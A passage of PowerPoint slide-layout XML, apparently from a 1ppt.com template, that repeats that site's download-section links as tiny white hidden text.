              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout107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07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07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07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0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08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08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08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08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08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08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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout108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08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08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08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0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09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09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09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09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09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09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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout109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09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09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09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1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10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10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10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10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10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10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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
